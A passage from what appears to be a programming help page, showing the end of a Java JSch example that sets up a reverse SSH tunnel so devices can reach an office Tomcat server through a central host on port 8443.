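              Session session = jsch.getSession("tunnel", "central.example.com", 22);
              session.connect();

              // Remote port 8443 on the central server forwards back to the local
              // Tomcat SSL port, so devices talk to central.example.com:8443 and
              // the traffic lands on the office server with no router changes.
              session.setPortForwardingR(8443, "localhost", 8443);

              // Keep the process alive; a real deployment would watch the session
              // and reconnect when it drops.
              Thread.sleep(Long.MAX_VALUE);
          }
      }

    Each office would get its own remote port on the central server, and the devices would be pointed at that host/port pair instead of at the office directly.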

    Read the article

< Previous Page | 12 13 14 15 16 17 18 19  | Next Page >